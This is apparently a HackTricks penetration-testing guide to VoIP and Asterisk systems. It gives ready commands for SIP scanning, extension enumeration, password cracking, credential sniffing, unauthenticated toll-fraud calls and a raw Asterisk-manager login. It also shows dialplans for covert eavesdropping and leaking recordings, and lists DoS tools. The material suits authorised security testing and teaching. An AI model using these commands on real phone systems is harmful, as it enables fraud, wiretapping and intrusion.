24 KiB
Pentesting VoIP
☁️ HackTricks Cloud ☁️🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
- Discover The PEASS Family, our collection of exclusive NFTs
- Get the official PEASS & HackTricks swag
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
- Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.
VoIP Basic Information
To start learning about how VoIP works check:
{% content-ref url="basic-voip-protocols/" %} basic-voip-protocols {% endcontent-ref %}
VoIP Enumeration
Telephone Numbers
One of the first steps a Red Team could do is to search available phone numbers to contact with the company using OSINT tools, Google Searches or scraping the web pages.
Once you have the telephone numbers you could use online services to identify the operator:
- https://www.numberingplans.com/?page=analysis&sub=phonenr
- https://mobilenumbertracker.com/
- https://www.whitepages.com/
- https://www.twilio.com/lookup
Knowing if the operator provides VoIP services you could identify if the company is using VoIP... Moreover, it's possible that the company hasn't hired VoIP services but is using PSTN cards to connect it's own VoIP PBX to the traditional telephony network.
Things such as automated responses of music usually indicates that VoIP is being used.
Google Dorks
# Grandstream phones
intitle:"Grandstream Device Configuration" Password
intitle:"Grandstream Device Configuration" (intext:password & intext:"Grandstream Device Configuration" & intext:"Grandstream Networks" | inurl:cgi-bin) -.com|org
# Cisco Callmanager
inurl:"ccmuser/logon.asp"
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button"
# Cisco phones
inurl:"NetworkConfiguration" cisco
# Linksys phones
intitle:"Sipura SPA Configuration"
# Snom phones
intitle:"snom" intext:"Welcome to Your Phone!" inurl:line_login.htm
# Polycom SoundPoint IP & phones
intitle:"SoundPoint IP Configuration Utility - Registration"
"Welcome to Polycom Web Configuration Utility" "Login as" "Password"
intext: "Welcome to Polycom Web Configuration Utility" intitle:"Polycom - Configuration Utility" inurl:"coreConf.htm"
intitle:"Polycom Login" inurl:"/login.html"
intitle:"Polycom Login" -.com
# Elastix
intitle:"Elastix - Login page" intext:"Elastix is licensed under GPL"
# FreePBX
inurl:"maint/index.php?FreePBX" intitle: "FreePBX" intext:"FreePBX Admministration"
OSINT information
Any other OSINT enumeration that helps to identify VoIP software being used will be helpful for a Red Team.
Network Enumeration
nmap
is capable of scanning UDP services, but because of the number of UDP services being scanned, it's very slow and might not ve very accurante with this kind of services.svmap
from SIPVicious (sudo apt install sipvicious
): Will locate SIP services in the indicated network.svmap
is easy to block because it uses the User-Agentfriendly-scanner
, but you could modify the code from/usr/share/sipvicious/sipvicious
and change it.
# Use --fp to fingerprint the services
svmap 192.168.1.0/24 -p 5060-5070 [--fp]
sipscan.py
from sippts: Sipscan is a very fast scanner for SIP services over UDP, TCP or TLS. It uses multithread and can scan large ranges of networks. It allows to easily indicate a port range, scan both TCP & UDP, use another method (by default it will use OPTIONS) and specify a different User-Agent (and more).
./sipscan.py -i 192.168.2.0/24 -p all -r 5060-5080 -th 200 -ua Cisco [-m REGISTER]
[!] IP/Network: 192.168.2.0/24
[!] Port range: 5060-5080
[!] Protocol: UDP, TCP, TLS
[!] Method to scan: REGISTER
[!] Customized User-Agent: Cisco
[!] Used threads: 200
- metasploit:
auxiliary/scanner/sip/options_tcp normal No SIP Endpoint Scanner (TCP)
auxiliary/scanner/sip/options normal No SIP Endpoint Scanner (UDP)
Extra Network Enumeration
The PBX could also be exposing other network services such as:
- 69/UDP (TFTP): Firmware updates
- 80 (HTTP) / 443 (HTTPS): To manage the device from the web
- 389 (LDAP): Alternative to store the users information
- 3306 (MySQL): MySQL database
- 5038 (Manager): Allows to use Asterisk from other platforms
- 5222 (XMPP): Messages using Jabber
- 5432 (PostgreSQL): PostgreSQL database
- And others...
Extension Enumeration
Extensions in a PBX (Private Branch Exchange) system refer to the unique internal identifiers assigned to individual phone lines, devices, or users within an organization or business. Extensions make it possible to route calls within the organization efficiently, without the need for individual external phone numbers for each user or device.
svwar
from SIPVicious (sudo apt install sipvicious
):svwar
is a free SIP PBX extension line scanner. In concept it works similar to traditional wardialers by guessing a range of extensions or a given list of extensions.
svwar 192.168.1.15 -p5060 -e100-300 -m REGISTER
sipextend.py
from sippts: Sipexten identifies extensions on a SIP server. Sipexten can check large network and port ranges.
python3 sipexten.py -i 192.168.2.203 -r 5080 -e 100-200
- metasploit: You can also enumerate extensions/usernames with metasploit:
auxiliary/scanner/sip/enumerator_tcp normal No SIP Username Enumerator (TCP)
auxiliary/scanner/sip/enumerator normal No SIP Username Enumerator (UDP)
enumiax
(apt install enumiax
): enumIAX is an Inter Asterisk Exchange protocol username brute-force enumerator. enumIAX may operate in two distinct modes; Sequential Username Guessing or Dictionary Attack.
enumiax -d /usr/share/wordlists/metasploit/unix_users.txt 192.168.1.1 # Use dictionary
enumiax -v -m3 -M3 192.168.1.1
VoIP Attacks
Password Brute-Force
Having discovered the PBX and some extensions/usernames, a Red Team could try to authenticate via the REGISTER
method to an extension using a dictionary of common passwords to brute force the authentication.
{% hint style="danger" %} Note that a username can be the same as the extension, but this practice may vary depending on the PBX system, its configuration, and the organization's preferences...
If the username is not the same as the extension, you will need to figure out the username to brute-force it. {% endhint %}
svcrack
from SIPVicious (sudo apt install sipvicious
): SVCrack allows you to crack the password for a specific username/extension on a PBX.
svcrack -u100 -d dictionary.txt udp://10.0.0.1:5080 #Crack known username
svcrack -u100 -r1-9999 -z4 10.0.0.1 #Check username in extensions
sipcrack.py
from sippts: SIP Digest Crack is a tool to crack the digest authentications within the SIP protocol.
{% code overflow="wrap" %}
python3 siprcrack.py -i 192.168.2.203 -r 5080 -e 100,101,103-105 -w wordlist/rockyou.txt
{% endcode %}
- Metasploit:
VoIP Sniffing
If you find VoIP equipment inside an Open Wifi network, you could sniff all the information. Moreover, if you are inside a more closed network (connected via Ethernet or protected Wifi) you could perform MitM attacks such as ARPspoofing between the PBX and the gateway in order to sniff the information.
Among the network information, you could find web credentials to manage the equipment, user extensions, username, IP addresses, even hashed passwords and RTP packets that you could reproduce to hear the conversation, and more.
To get this information you could use tools such as Wireshark, tcpdump... but a specially created tool to sniff VoIP conversations is ucsniff.
{% hint style="danger" %}
Note that if TLS is used in the SIP communication you won't be able to see the SIP communication in clear.
The same will happen if SRTP and ZRTP is used, RTP packets won't be in clear text.
{% endhint %}
SIP credentials
Check this example to understand better a SIP REGISTER communication to learn how are credentials being sent.
sipdump
&sipcrack
, part of sipcrack (apt-get install sipcrack
): These tools can extract from a pcap the digest authentications within the SIP protocol and bruteforce them.
sipdump -p net-capture.pcap sip-creds.txt
sipcrack sip-creds.txt -w dict.txt
siptshar.py
,sipdump.py
,sipcrack.py
from sippts:- SipTshark extracts data of SIP protocol from a PCAP file.
- SipDump Extracts SIP Digest authentications from a PCAP file.
- SIP Digest Crack is a tool to crack the digest authentications within the SIP protocol.
python3 siptshark.py -f captura3.pcap [-filter auth]
python3 sipdump.py -f captura3.pcap -o data.txt
python3 sipcrack.py -f data.txt -w wordlist/rockyou.txt
DTMF codes
Not only SIP credentials can be found in the network traffic, it's also possible to find DTMF codes which are used for example to access the voicemail.
It's possible to send these codes in INFO SIP messages, in audio or inside RTP packets. If the codes are inside RTP packets, you could cut that part of the conversation and use the tool multimo to extract them:
multimon -a DTMF -t wac pin.wav
Asterisks Connections Misconfigurations
In Asterisk it's possible to allow a connection from an specific IP address or from any IP address:
host=10.10.10.10
host=dynamic
If an IP address is specified, the host won't need to send REGISTER requests every once in a while (in the REGISTER packet is sent the time to live, usually 30min, which means that in other scenario the phone will need to REGISTER every 30mins). However, it'll need to have open ports allowing connections from the VoIP server to take calls.
To define users they can be defined as:
type=user
: The user can only receive calls as user.type=friend
: It's possible to perform calls as peer and receive them as user (used with extensions)type=peer
: It's possible to send and receive calls as peer (SIP-trunks)
It's also possible to establish trust with the insecure variable:
insecure=port
: Allows peer connections validated by IP.insecure=invite
: Doesn't require authentication for INVITE messagesinsecure=port,invite
: Both
{% hint style="warning" %}
When type=friend
is used, the value of the host variable won't be used, so if an admin misconfigure a SIP-trunk using that value, anyone will be able to connect to it.
For example, this configuration would be vulnerable:
host=10.10.10.10
insecure=port,invite
type=friend
{% endhint %}
Asterisks Context Misconfigurations
In Asterisk a context is a named container or section in the dial plan that groups together related extensions, actions, and rules. The dial plan is the core component of an Asterisk system, as it defines how incoming and outgoing calls are handled and routed. Contexts are used to organize the dial plan, manage access control, and provide separation between different parts of the system.
Each context is defined in the configuration file, typically in the extensions.conf
file. Contexts are denoted by square brackets, with the context name enclosed within them. For example:
csharpCopy code[my_context]
Inside the context, you define extensions (patterns of dialed numbers) and associate them with a series of actions or applications. These actions determine how the call is processed. For instance:
[my_context]
exten => 100,1,Answer()
exten => 100,n,Playback(welcome)
exten => 100,n,Hangup()
This example demonstrates a simple context called "my_context" with an extension "100". When someone dials 100, the call will be answered, a welcome message will be played, and then the call will be terminated.
This is another context that allows to call to any other number:
[external]
exten => _X.,1,Dial(SIP/trunk/${EXTEN})
If the admin defines the default context as:
[default]
include => my_context
include => external
{% hint style="warning" %} Anyone will be able to use the server to call to any other number (and the admin of the server will pay for the call). {% endhint %}
{% hint style="danger" %}
Moreover, by default the sip.conf
file contains allowguest=true
, then any attacker with no authentication will be able to call to any other number.
{% endhint %}
-
sipinvite.py
from sippts: Sipinvite checks if a PBX server allows us to make calls without authentication. If the SIP server has an incorrect configuration, it will allow us to make calls to external numbers. It can also allow us to transfer the call to a second external number.For example, if your Asterisk server has a bad context configuration, you can accept INVITE request without authorization. In this case, an attacker can make calls without knowing any user/pass.
{% code overflow="wrap" %}
# Trying to make a call to the number 555555555 (without auth) with source number 200.
python3 sipinvite.py -i 192.168.0.1 -fu 200 -tu 555555555 -v
# Trying to make a call to the number 555555555 (without auth) and transfer it to number 444444444.
python3 sipinvite.py -i 192.168.0.1 -tu 555555555 -t 444444444
{% endcode %}
Misconfigured IVRS
IVRS stands for Interactive Voice Response System, a telephony technology that allows users to interact with a computerized system through voice or touch-tone inputs. IVRS is used to build automated call handling systems that offer a range of functionalities, such as providing information, routing calls, and capturing user input.
IVRS in VoIP systems typically consists of:
- Voice prompts: Pre-recorded audio messages that guide users through the IVR menu options and instructions.
- DTMF (Dual-Tone Multi-Frequency) signaling: Touch-tone inputs generated by pressing keys on the phone, which are used to navigate through the IVR menus and provide input.
- Call routing: Directing calls to the appropriate destination, such as specific departments, agents, or extensions based on user input.
- User input capture: Collecting information from callers, such as account numbers, case IDs, or any other relevant data.
- Integration with external systems: Connecting the IVR system to databases or other software systems to access or update information, perform actions, or trigger events.
In an Asterisk VoIP system, you can create an IVR using the dial plan (extensions.conf
file) and various applications such as Background()
, Playback()
, Read()
, and more. These applications help you play voice prompts, capture user input, and control the call flow.
Example of vulnerable configuration
exten => 0,100,Read(numbers,the_call,,,,5)
exten => 0,101,GotoIf("$[${numbers}"="1"]?200)
exten => 0,102,GotoIf("$[${numbers}"="2"]?300)
exten => 0,103,GotoIf("$[${numbers}"=""]?100)
exten => 0,104,Dial(LOCAL/${numbers})
The previous is a example where the user is asked to press 1 to call a department, 2 to call another, or the complete extension if he knows it.
The vulnerability is the fact that the indicated extension length is not checked, so a user could input the 5seconds timeout a complete number and it will be called.
Extension Injection
Using a extension such as:
exten => _X.,1,Dial(SIP/${EXTEN})
Where ${EXTEN}
is the extension that will be called, when the ext 101 is introduced this is what would happen:
exten => 101,1,Dial(SIP/101)
However, if ${EXTEN}
allows to introduce more than numbers (like in older Asterisk versions), an attacker could introduce 101&SIP123123123
to call the phone number 123123123. And this would be the result:
exten => 101&SIP123123123,1,Dial(SIP/101&SIP123123123)
Therefore, a call to the extension 101
and 123123123
will be send and only the first one getting the call would be stablished... but if an attacker use an extension that bypasses any match that is being performed but doesn't exist, he could be inject a call only to the desired number.
Click2Call
Click2Call allows a web user (who for example might be interested in a product) to introduce his telephone number to get called. Then a commercial will be called, and when he picks up the phone the user will be called and connected with the agent.
A common Asterisk profile for this is:
[web_user]
secret = complex_password
deny = 0.0.0.0/0.0.0.0
allow = 0.0.0.0/0.0.0.0
displayconnects = yes
read = system,call,log,verbose,agent,user,config,dtmf,reporting,crd,diapla
write = system,call,agent,user,config,command,reporting,originate
- The previos profile is allowing ANY IP address to connect (if the password is known).
- To organize a call, like specified previously, no read permissions is necessary and only originate in write is needed.
With those permissions any IP knowing the password could connect and extract too much info, like:
{% code overflow="wrap" %}
# Get all the peers
exec 3<>/dev/tcp/10.10.10.10/5038 && echo -e "Action: Login\nUsername:test\nSecret:password\nEvents: off\n\nAction:Command\nCommand: sip show peers\n\nAction: logoff\n\n">&3 && cat <&3
{% endcode %}
More information or actions could be requested.
Eavesdropping
In Asterisk it's possible to use the command ChanSpy
indicating the extension(s) to monitor (or all of them) to hear conversations that are happening. This command need to be assigned to an extension.
For example, exten => 333,1,ChanSpy('all',qb)
indicate that if you call the extension 333, it will monitor all
the extensions, start listening whenever a new conversation start (b
) in quiet mode (q
) as we don't want to interact on it. You could go from one conversation happening to another pressing *
, or marking the extension number.
It's also possible tu use ExtenSpy
to monitor one extension only.
Instead of listening the conversations, it's possible to record them in files using an extension such as:
{% code overflow="wrap" %}
[recorded-context]
exten => _X.,1,Set(NAME=/tmp/${CONTEXT}_${EXTEN}_${CALLERID(num)}_${UNIQUEID}.wav)
exten => _X.,2,MixMonitor(${NAME})
{% endcode %}
Calls will be saved in /tmp
.
You could also even make Asterisk execute a script that will leak the call when it's closed.
exten => h,1,System(/tmp/leak_conv.sh &)
RTP Injection
It's possible to insert a .wav
in converstions using tools such as rtpinsertsound
(sudo apt install rtpinsertsound
) and rtpmixsound
(sudo apt install rtpmixsound
).
Or you could use the scripts from http://blog.pepelux.org/2011/09/13/inyectando-trafico-rtp-en-una-conversacion-voip/ to scan conversations (rtpscan.pl
), send a .wav
to a conversation (rtpsend.pl
) and insert noise in a conversation (rtpflood.pl
).
DoS
There are several ways to try to achieve DoS in VoIP servers.
- IAXFlooder: DoS IAX protocol used by Asterisk
- inviteflood: A tool to perform SIP/SDP INVITE message flooding over UDP/IP.
- rtpflood: Send several well formed RTP packets. Its needed to know the RTP ports that are being used (sniff first).
- SIPp: Allows to analyze and generate SIP traffic. so it can be used to DoS also.
- SIPsak: SIP swiss army knife. Can also be used to perform SIP attacks.
- Fuzzers: protos-sip, voiper.
☁️ HackTricks Cloud ☁️🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Do you work in a cybersecurity company? Do you want to see your company advertised in HackTricks? or do you want to have access to the latest version of the PEASS or download HackTricks in PDF? Check the SUBSCRIPTION PLANS!
- Discover The PEASS Family, our collection of exclusive NFTs
- Get the official PEASS & HackTricks swag
- Join the 💬 Discord group or the telegram group or follow me on Twitter 🐦@carlospolopm.
- Share your hacking tricks by submitting PRs to the hacktricks repo and hacktricks-cloud repo.